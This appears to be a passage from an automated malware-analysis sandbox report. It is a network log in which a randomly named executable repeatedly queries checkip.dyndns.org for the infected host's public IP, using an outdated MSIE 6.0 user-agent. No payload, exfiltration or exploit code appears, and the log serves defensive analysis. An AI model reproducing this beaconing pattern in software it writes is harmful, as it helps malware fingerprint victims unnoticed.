Jan 10, 2025 21:54:06.070350885 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 20:54:05 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.5	50017	132.226.247.73	80	2672	C:\Users\user\Desktop\2CQ2zMn0hb.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 21:54:06.959592104 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 21:54:07.653879881 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 20:54:07 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.5	50019	132.226.247.73	80	2672	C:\Users\user\Desktop\2CQ2zMn0hb.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 21:54:08.672385931 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 21:54:09.363729954 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 20:54:09 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.5	50021	132.226.247.73	80	2672	C:\Users\user\Desktop\2CQ2zMn0hb.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 21:54:10.320934057 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 21:54:11.011043072 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 20:54:10 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.5	50023	132.226.247.73	80	2672	C:\Users\user\Desktop\2CQ2zMn0hb.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 21:54:12.158607006 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 21:54:12.840878963 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 20:54:12 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.5	50025	132.226.247.73	80	2672	C:\Users\user\Desktop\2CQ2zMn0hb.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 21:54:13.890842915 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 21:54:14.568340063 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 20:54:14 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.5	50027	132.226.247.73	80	2672	C:\Users\user\Desktop\2CQ2zMn0hb.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 21:54:15.749733925 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 21:54:16.448885918 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 20:54:16 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.5	50029	132.226.247.73	80	2672	C:\Users\user\Desktop\2CQ2zMn0hb.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 21:54:17.407418013 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 21:54:18.107491970 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 20:54:18 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.5	50031	132.226.247.73	80	2672	C:\Users\user\Desktop\2CQ2zMn0hb.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 21:54:19.019947052 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 21:54:19.711462975 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 20:54:19 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.5	50033	132.226.247.73	80	2672	C:\Users\user\Desktop\2CQ2zMn0hb.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 21:54:20.674637079 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 21:54:21.383222103 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 20:54:21 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.5	50035	132.226.247.73	80	2672	C:\Users\user\Desktop\2CQ2zMn0hb.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 21:54:22.346035957 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 21:54:23.018646002 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 20:54:22 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.5	50037	132.226.247.73	80	2672	C:\Users\user\Desktop\2CQ2zMn0hb.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 21:54:23.950419903 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 21:54:24.646056890 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 20:54:24 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.5	50039	132.226.247.73	80	2672	C:\Users\user\Desktop\2CQ2zMn0hb.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 21:54:25.645160913 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 21:54:26.336905956 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 20:54:26 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.5	50041	132.226.247.73	80	2672	C:\Users\user\Desktop\2CQ2zMn0hb.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 21:54:27.286241055 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 21:54:27.987797022 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 20:54:27 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.5	50043	132.226.247.73	80	2672	C:\Users\user\Desktop\2CQ2zMn0hb.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 21:54:28.976141930 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 21:54:29.652610064 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 20:54:29 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.5	50045	132.226.247.73	80	2672	C:\Users\user\Desktop\2CQ2zMn0hb.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 21:54:30.729417086 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 21:54:31.428575039 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 20:54:31 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.5	50047	132.226.247.73	80	2672	C:\Users\user\Desktop\2CQ2zMn0hb.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 21:54:32.690221071 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 21:54:33.393652916 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 20:54:33 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.5	50049	132.226.247.73	80	2672	C:\Users\user\Desktop\2CQ2zMn0hb.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 21:54:34.443214893 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 21:54:35.128767967 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 20:54:35 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.5	50051	132.226.247.73	80	2672	C:\Users\user\Desktop\2CQ2zMn0hb.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 21:54:36.131848097 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 21:54:36.847985983 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 20:54:36 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.5	50053	132.226.247.73	80	2672	C:\Users\user\Desktop\2CQ2zMn0hb.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 21:54:37.987035036 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 21:54:38.671724081 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 20:54:38 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.5	50055	132.226.247.73	80	2672	C:\Users\user\Desktop\2CQ2zMn0hb.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 21:54:39.585087061 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 21:54:40.275865078 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 20:54:40 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.5	50057	132.226.247.73	80	2672	C:\Users\user\Desktop\2CQ2zMn0hb.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 21:54:41.376315117 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 21:54:42.094899893 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 20:54:41 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.5	50059	132.226.247.73	80	2672	C:\Users\user\Desktop\2CQ2zMn0hb.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 21:54:43.165463924 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 21:54:43.851001978 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 20:54:43 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.5	50061	132.226.247.73	80	2672	C:\Users\user\Desktop\2CQ2zMn0hb.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 21:54:44.909847975 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
